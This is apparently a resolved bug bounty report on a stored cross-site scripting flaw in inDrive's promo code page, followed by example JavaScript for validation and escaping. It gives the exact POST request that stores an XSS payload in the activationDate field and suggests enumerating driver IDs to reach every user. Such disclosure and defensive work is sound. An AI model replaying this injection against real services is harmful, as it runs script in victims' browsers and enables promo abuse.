Stored XSS on promo.indrive.com

Medium
inDrive
Reported by kristoferent

Vulnerability Details

Technical details and impact analysis

Cross-site Scripting (XSS) - Stored
## Summary:

The functionality on https://promo.indrive.com/promocodes allows drivers to find and activate promocodes. It requires a driver ID. When a user activates their promocode, the browser makes a POST request to https://id.indrive.com/api/spreadsheet/promocodes with parameters **id** (driver ID) and **activationDate** (the date of the promocode activation). It is possible for an attacker to set the **activationDate** parameter value to an XSS payload. When a user inputs the same ID when looking for promocodes, the XSS payload will trigger, executing arbitrary JavaScript code in the victim's browser.

## Steps To Reproduce:

1. Make a POST request to https://id.indrive.com/api/spreadsheet/promocodes with the following body:

   ```json
   {"id":"4","activationDate":"<script>alert(1)</script>"}
   ```

   {F2470829}

   The driver ID value of **4** is used, but the attacker can enumerate through valid driver IDs to inject the payload into every user's promocode.

2. Go to https://promo.indrive.com/promocodes

3. Input a driver ID (in my example **4**) and click "Проверить ID" ("Check ID"). The XSS payload will be triggered.

   {F2470832}

## Supporting Material/References:

Full POST Request:

```http
POST /api/spreadsheet/promocodes HTTP/1.1
Host: id.indrive.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 55
Origin: https://promo.indrive.com
Referer: https://promo.indrive.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers
Connection: close

{"id":"4","activationDate":"<script>alert(1)</script>"}
```

## Impact

This vulnerability allows an attacker to execute arbitrary JavaScript code in any user's browser. Despite this being a retired functionality, an attacker could trick users into trying to get a promocode.

This could also potentially make promocodes usable an infinite number of times by directly making POST requests to renew the code every 24 hours.
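The two defensive controls that would have stopped this report's injection, as an added example that is not inDrive's code: strict validation of **activationDate** on the API side so the payload is never stored, plus HTML escaping when the stored record is rendered on the promo page. The handler, the in-memory store and the render function are assumptions made for the example.

```javascript
// Added example (not inDrive's code): defensive checks for the activationDate
// field from the report. The handler and store names are hypothetical.

// 1. API side: accept activationDate only as a strict YYYY-MM-DD calendar date.
const ISO_DATE = /^(\d{4})-(\d{2})-(\d{2})$/;

function isValidActivationDate(value) {
  if (typeof value !== "string") return false;
  const m = ISO_DATE.exec(value);
  if (!m) return false;
  const [, y, mo, d] = m.map(Number);
  // Round-trip through Date to reject impossible dates such as 2024-02-30.
  const dt = new Date(Date.UTC(y, mo - 1, d));
  return dt.getUTCFullYear() === y && dt.getUTCMonth() === mo - 1 && dt.getUTCDate() === d;
}

// Hypothetical handler for POST /api/spreadsheet/promocodes. A body whose
// activationDate is not a plain date (e.g. "<script>...") is rejected with 400,
// so nothing script-like ever reaches the spreadsheet/store.
function handleActivate(body, store) {
  if (typeof body.id !== "string" || !/^\d+$/.test(body.id)) {
    return { status: 400, error: "invalid id" };
  }
  if (!isValidActivationDate(body.activationDate)) {
    return { status: 400, error: "activationDate must be YYYY-MM-DD" };
  }
  store.set(body.id, { activationDate: body.activationDate });
  return { status: 200 };
}

// 2. Page side: whatever was stored is still HTML-escaped before insertion into
// the promo page, so bad data already in the store cannot execute either.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

function renderPromo(record) {
  return `<p>Activated on: ${escapeHtml(record.activationDate)}</p>`;
}
```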

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$284.00

Weakness

Cross-site Scripting (XSS) - Stored